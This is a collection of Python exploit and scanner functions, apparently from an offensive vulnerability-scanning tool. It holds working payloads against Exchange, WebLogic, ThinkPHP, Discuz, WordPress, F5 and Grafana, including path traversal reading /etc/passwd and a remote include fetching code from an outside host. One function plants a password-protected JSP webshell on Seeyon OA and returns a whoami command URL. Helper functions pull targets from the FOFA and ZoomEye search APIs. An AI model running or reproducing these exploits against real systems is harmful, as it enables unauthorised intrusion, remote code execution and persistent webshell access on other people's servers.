def poc(url): if not url.startswith("http"): url = "https://" + url url = get_standard_url(url) try: r1 = request.get(url + "/owa", timeout=5, verify=False, allow_redirects=False) # print(r1.text) if r1.status_code != 200: return False r2 = request.get( url + "/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]", timeout=5, verify=False, allow_redirects=False) if r2.status_code == 200 and "Exchange" in r2.text: return True except Exception as e: # print(e) pass return False
def poc(url): # 首先对url进行处理 # url = "http://www.example.org:7001/default.html?ct=32&op=92&item=98" # --> http://www.example.org:7001 if url[:4] != "http": url = "http://" + url o = urlparse(url) url = o.scheme + "://" + o.netloc # 首先判断attack_url是否可访问 try: attack_url = url + '/_async/AsyncResponseService' r = request.get(url=attack_url, headers=get_headers, timeout=4, verify=False) if r.status_code != 200: return [] except: return [] # 因为不知道目标是linux还是windows,所以直接都检验一遍 # 如果存在漏洞,则将shell路径保存在webshell_path中 webshell_path = [] linux_check_1(url, webshell_path) linux_check_2(url, webshell_path) windows_check_1(url, webshell_path) windows_check_2(url, webshell_path) return webshell_path
def poc(domain_url): try: # if "https://" in domain_url: # protocol = "https://" # else: # protocol = "http://" # return to top path # 'https://www.xiaogeng.com.cn/admin.php?id=6'==>'https://www.xiaogeng.com.cn' #key_tmp = tldextract.extract(domain_url) #domain_url = protocol + key_tmp.subdomain + '.' + key_tmp.domain+'.' + key_tmp.suffix if "http" not in domain_url: domain_url = "http://" + domain_url poc0 = '/index.php/?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1' poc1 = '/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1' poc2 = '/index.php/?s=index/\\think\Request/input&filter=phpinfo&data=1' poc3 = '/index.php?s=/index/\\think\\request/cache&key=1|phpinfo' poclist = [poc0,poc1,poc2,poc3] headers = { "Accept": "*/*", "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.50", "X-Forwarded-For":"192.168.1.1" } for poc in poclist: r = request.get(domain_url + poc, headers=headers,verify=False, timeout =10,allow_redirects=False) if "PHP Version" in r.text: return domain_url + poc return 0 except Exception as e: return 0
def poc(url): url = get_standard_url(url) url = url + "/forum.php" try: r = request.get(url, timeout=5) tmp = re.split(" |=|,", r.headers['Set-Cookie']) field = [i for i in tmp if "language" in i] if not field: return False # print(f"{url}:{field}") cookie = {field[0]: "'.phpinfo().'"} r = request.get(url, cookies=cookie, timeout=5) if "PHP Version" in r.text: return True except: return False
def poc(url): headers = { 'Content-Type': 'application/x-www-form-urlencoded', } target = get_standard_url(url) url = target + url_payload try: res = request.get(url, headers=headers, timeout=5, allow_redirects=False, verify=False) if res.status_code == 200: url2 = target + "/secquan.php" res2 = request.get(url2, headers=headers, timeout=5, allow_redirects=False, verify=False) if "bug exist" in res2.text: return target + "/secquan.php" except: pass return False
def poc(url): # url = "http://www.example.org:8080/default.html?ct=32&op=92&item=98" # --> http://www.example.org:8080 if url[:4] != "http": url = "http://" + url o = urlparse(url) url = o.scheme + "://" + o.netloc # 自定义的shell地址,内容为 <pre>eval($_REQUEST['z']);</pre> shellpath = "http://saucer-man.com/aa.txt" # 执行的shell命令 shell = "phpinfo();" vulnurl = url + "/wp-admin/admin-post.php?swp_debug=load_options&swp_url={shellpath}&z={shell}".format( shellpath=shellpath, shell=shell) try: print(vulnurl) headers = {"User-Agent": get_random_ua()} r = request.get(vulnurl, headers=headers, timeout=5, verify=False, allow_redirects=False) print(r.status_code) print(r.headers) print(r.text) if r.status_code == 200 and "PHP Version" in r.text: return vulnurl else: return False except: return False
def poc(url): # url = "www.example.org/default.html?ct=32&op=92&item=98" # --> http://www.example.org if url[:4] != "http": url = "http://" + url o = urlparse(url) url = o.scheme + "://" + o.netloc headers = { "User-Agent":get_random_ua() } # shell_name can modify it yourself shell_name="config_db1.jsp" shell_url = url + "/seeyon/" + shell_name try: # just prevent being attacked res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False) if res.status_code == 200 and ":-)" in res.text: return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami' except: pass shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name # def_shell content can modufy iy youself def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>""" def_shell = def_shell.encode() base_header = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkZUFENXlSUUh3TG9pcVJqaWRnNjYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo=" payload_head_len = 283 + len(f_base64encode(shell_name)) payload_shell_len = len(def_shell) payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8') payload_shell_name = f_base64encode(shell_name) payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str( payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66', payload_shell_name), 'utf-8') + payload_shell try: request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False) res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text except: return False if ":-)" in res: return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami' else: return False
def handle_fofa(query, limit, offset=0): try: msg = '[+] Trying to login with credentials in config file: {}.'.format( paths.CONFIG_PATH) colorprint.green(msg) email = ConfigFileParser().fofa_email() key = ConfigFileParser().fofa_key() #print(key) if check(email, key): pass else: raise Exception( "Automatic authorization failed") # will go to except block except Exception as e: logger.debug(e) msg = '[*] Automatic authorization failed.' colorprint.cyan(msg) msg = '[*] Please input your FoFa Email and API Key below.' colorprint.cyan(msg) email = input("[*] Fofa Email: ").strip() key = input('[*] Fofa API Key: ').strip() if not check(email, key): msg = '[-] Fofa API authorization failed, Please re-run it and enter a valid key.' colorprint.red(msg) sys.exit() query = base64.b64encode(query.encode('utf-8')).decode('utf-8') # count how many result to search size = limit + offset url = f"https://fofa.so/api/v1/search/all?email={email}&key={key}&qbase64={query}&size={size}" try: response = request.get(url).text resp = json.loads(response) if not resp["error"]: for item in resp.get('results')[offset:]: #print(type(item[0])) if 'https:' not in item[0]: try: requests.get("http://" + item[0], timeout=5, verify=False) conf.target.add("http://" + item[0]) print("http://" + item[0]) except: pass else: try: requests.get(item[0], timeout=5, verify=False) conf.target.add(item[0]) print(item[0]) except: pass except Exception as e: colorprint.red(e) sys.exit()
def jupyter(host, result, ports=[8888]): for port in ports: try: r = request.get(f"http://{host}:{port}", timeout=5, verify=False) if "clusters" in r.text: result.append(f"jupyter: {host}:{port}") except: pass
def elasticsearch(host, result, ports = [9200]): for port in ports: try: r = request.get(f"http://{host}:{port}", timeout=5, allow_redirects=False, verify=False) if "elasticsearch" in r.text: result.append(f"elasticsearch: {host}:{port}") except: pass
def hadoop(host, result, ports=[8088]): for port in ports: try: r = request.get(f"http://{host}:{port}/cluster", timeout=5, allow_redirects=False, verify=False) if "Hadoop" in r.text: result.append(f"hadoop: {host}:{port}") except: pass
def genkins(host, result, ports=[8080]): for port in ports: try: payload = f"http://{host}:{port}/manage" r = request.get(payload, timeout=5, allow_redirects=False, verify=False) if "genkins" in r.text: result.append(f"genkins: {payload}") except: pass
def docker(host, result, ports=[2375]): # exp: https://github.com/Tycx2ry/docker_api_vul for port in ports: try: r = request.get(f"http://{host}:{port}/version", timeout=5, verify=False) if "ApiVersion" in r.text: result.append(f"docker: {host}:{port}") except: pass
def couchdb(host, result, ports=[5984]): for port in ports: try: url = f"http://{host}:{port}" r = request.get(url, timeout=5, allow_redirects=False, verify=False) if "couchdb" in r.text: result.append(f"couchdb: {host}:{port}") except: pass
def poc(url): url = get_standard_url(url) try: r = request.get(f"{url}/current_config/passwd", timeout=10) if r.status_code == 200 and "name:passwd" in r.text: return True except: pass return False
def jboss(host, result, ports=[8080]): for port in ports: try: payload = f"http://{host}:{port}/jmx-console/" r = request.get(payload, timeout=5, allow_redirects=False, verify=False) if "jboss" in r.text: result.append(f"jboss: {payload}") except: pass
def poc(url): url = get_standard_url(url) url = url + "/debug.php" try: r = request.get(url, timeout=5) if r.status_code == 200: return True except: pass return False
def poc(url): try: payload = f"{get_standard_url(url)}/manage" r = request.get(payload, allow_redirects=False, verify=False) if "genkins" in r.text: return True except: # traceback.print_exc() pass return False
def check(email, key): # verify email and key if email and key: auth_url = "https://fofa.so/api/v1/info/my?email={0}&key={1}".format(email, key) try: response = request.get(auth_url) if response.status_code == 200: return True except Exception as e: logger.debug(e) return False return False
def poc(url): base = get_standard_url(url) vuln_url = f"{base}/mgmt/shared/authn/login" try: r = request.get(vuln_url, verify=False, timeout=5) json.loads(r.text) if "resterrorresponse" in r.text or "message" in r.text: return vuln_url except: pass return False
def poc(url): vuln_url = f"{get_standard_url(url)}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" try: r = request.get(vuln_url, verify=False, allow_redirects=False, timeout=5) if r.status_code == 200 and "root:x:" in r.text: return vuln_url except: pass return False
def poc(url): url = get_standard_url(url) path = url + "/graph_realtime.php?action=init" try: # print(path) req = request.get(path, timeout=5) if req.status_code == 200 and "poller_realtime.php" in req.text: return True else: return False except: return False
def poc(url): headers = { "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" } payload = "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search" vulnurl = url + payload try: req = request.get(vulnurl, headers=headers, timeout=10) if r"weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and r"IO Exception on sendMessage" not in req.text: return True else: return False except: return False
def resources_info(self): """Resource info shows us available search times. host-search: total number of available host records to search web-search: total number of available web records to search """ data = None zoomeye_api = "https://api.zoomeye.org/resources-info" headers = {'Authorization': 'JWT %s' % self.token} resp = request.get(zoomeye_api, headers=headers) if resp and resp.status_code == 200 and 'plan' in resp.json(): data = resp.json() return data
def can_auto_login(): if UID and SECRET: try: res = request.get(API_URL + "/data", auth=(UID, SECRET), timeout=10) if res.status_code != 200: raise SystemExit else: return True except: return False else: return False
def poc(url): # url = "http://www.example.org/default.html?ct=32&op=92&item=98" # --> http://www.example.org if url[:4] != "http": url = "http://" + url o = urlparse(url) url = o.scheme + "://" + o.netloc + payload try: req = request.get(url, headers=headers, timeout=5, allow_redirects=False, verify=False) if req.status_code == 200 and "database" in req.text.lower(): return url else: return False except: return False
def poc(url): if not url.startswith("http"): url = "http://" + url o = urlparse(url) port = o.port if o.port else 8081 try: target = f"{o.scheme}://{o.hostname}:{port}" # print(target) res = request.get(url=target, timeout=5) if "apache flink" in res.text.lower(): return True else: return False except: return False
def bak_scan(url, payloads, result): headers = {"User-Agent": get_random_ua()} while not payloads.empty(): payload = payloads.get() vulnurl = url + "/" + payload try: flag = 0 # 如果是备份文件则不需要下载,只需要head方法获取头部信息即可,否则文件较大会浪费大量的时间 if 'zip' in payload or 'rar' in payload or 'gz' in payload or 'sql' in payload: req = request.head(vulnurl, headers=headers, timeout=5, allow_redirects=False, verify=False) # 404页面 'Content-Type': 'application/octet-stream', # zip 'application/x-zip-compressed' 'application/zip' # rar 'application/octet-stream' 'application/x-rar-compressed' # 采用Content-Type过滤,还是有一定误报 if req.status_code == 200: if 'html' not in req.headers[ 'Content-Type'] and 'image' not in req.headers[ 'Content-Type']: flag = 1 # 当检验git和svn、hg时则需要验证返回内容,get方法 else: req = request.get(vulnurl, headers=headers, timeout=5, verify=False, allow_redirects=False) if req.status_code == 200: if 'svn' in payload: if 'dir' in req.text and 'svn' in req.text: flag = 1 elif 'git' in payload: if 'repository' in req.text: flag = 1 elif 'hg' in payload: if 'hg' in req.text: flag = 1 elif '/WEB-INF/web.xml' in payload: if 'web-app' in req.text: flag = 1 if flag == 1: result.append(vulnurl) except Exception as e: # print(e) continue
def can_auto_login(): if UID and SECRET: msg = '[+] Trying to login with credentials in config file: %s.' % paths.CONFIG_PATH print(msg) try: res = request.get(API_URL + "/data", auth=(UID, SECRET), timeout=10) if res.status_code != 200: raise SystemExit else: return True except: return False else: return False
def poc(url): plugins = [ "cloudwatch", "dashlist", "elasticsearch", "graph", "graphite", "heatmap", "influxdb", "mysql", "opentsdb", "pluginlist", "postgres", "prometheus", "stackdriver", "table", "text" ] base = get_standard_url(url) for plugin in plugins: vuln_url = f"{base}/public/plugins/{plugin}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd" try: r = request.get(vuln_url, verify=False, timeout=5) if r.status_code == 200 and "root:x:" in r.text: return vuln_url except: pass return False